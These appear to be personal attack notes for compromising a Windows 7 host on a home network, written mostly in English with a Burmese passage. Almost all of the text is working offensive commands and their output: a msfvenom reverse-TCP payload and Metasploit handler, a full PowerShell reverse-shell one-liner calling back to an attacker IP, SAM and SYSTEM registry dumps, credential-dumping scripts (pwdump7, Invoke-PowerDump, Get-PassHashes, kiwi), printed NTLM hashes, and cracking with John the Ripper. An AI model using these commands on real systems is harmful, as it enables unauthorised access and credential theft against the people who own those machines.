exploit win7

#metasploit #encrypt-decrpyt #walkthrought 
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.11 LPORT=4444 -f exe > reverse.exe 

msfconsole

use exploit/multi/handler

 set lhost 192.168.0.11

set payload windows/meterpreter/reverse_tcp

exploit

!!!BOOM!!!

![[Recording 20230919064714.webm]]

powershell -w hidden -nop -c $a='192.168.0.11';$b=4444;$c=New-Object system.net.sockets.tcpclient;$nb=New-Object System.Byte[] $c.ReceiveBufferSize;$ob=New-Object System.Byte[] 65536;$eb=New-Object System.Byte[] 65536;$e=new-object System.Text.UTF8Encoding;$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.RedirectStandardError=1;$p.StartInfo.UseShellExecute=0;$q=$p.Start();$is=$p.StandardInput;$os=$p.StandardOutput;$es=$p.StandardError;$osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null);$esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null);$c.connect($a,$b);$s=$c.GetStream();while ($true) {    start-sleep -m 100;    if ($osread.IsCompleted -and $osread.Result -ne 0) {      $r=$os.BaseStream.EndRead($osread);      $s.Write($ob,0,$r);      $s.Flush();      $osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null);    }    if ($esread.IsCompleted -and $esread.Result -ne 0) {      $r=$es.BaseStream.EndRead($esread);      $s.Write($eb,0,$r);      $s.Flush();      $esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null);    }    if ($s.DataAvailable) {      $r=$s.Read($nb,0,$nb.Length);      if ($r -lt 1) {          break;      } else {          $str=$e.GetString($nb,0,$r);          $is.write($str);      }    }    if ($c.Connected -ne $true -or SelectRead) -and $c.Client.Available -eq 0)) {        break;    }    if ($p.ExitCode -ne $null {        break;    }}

https://www.tarasco.org/security/pwdump_7/
cmd ကို R-click >> Run as administrator နဲ့ ဖွင့်@ပီးေတာ့ cd
command ကို သံုး@ပီး pwdump7 directory ထဲ ကို ဝင်ထားပါတယ်။ @ပီးေတာ့မှ
PwDump7.exe

reg save HKLM\SAM C:\Users\ykh\Desktop\sam

reg save HKLM\SYSTEM C:\Users\ykh\Desktop\system

load powershell

locate Invoke-PowerDump.ps1

/usr/share/powershell-empire/empire/server/data/module_source/credentials/Invoke-PowerDump.ps1

meterpreter>powershell_import /usr/share/powershell-empire/empire/server/data/module_source/credentials/Invoke-PowerDump.ps1

powershell_execute Invoke-PowerDump

try another way

locate Get-PassHashe.ps1

apt install nishang

powershell_import /usr/share/nishang/Gather/Get-PassHashes.ps1

powershell_execute Get-PassHashes

meterpreter > powershell_execute Get-PassHashes
[+] Command execution completed:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ykh:1000:aad3b435b51404eeaad3b435b51404ee:7244793fc0454da4a1ca80fae09118b2:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:94e54c5b9a75664330dde45320e6c5dc:::

search credential_collector

use 0

set SESSION 2

background

load kiwi

lsa_dump_sam

Collecting hashes...
Administrator:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
Guest:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
HomeGroupUser$:aad3b435b51404eeaad3b435b51404ee:94e54c5b9a75664330dde45320e6c5dc
ykh:aad3b435b51404eeaad3b435b51404ee:7244793fc0454da4a1ca80fae09118b2

nano winhashes
crack command

john --format=NT --wordlist=/usr/share/worlists/rockyou.txt winhashes

Test try to log in

crackmapexec smb 192.168.0.152 -u 'ykh' -p 'password' --sam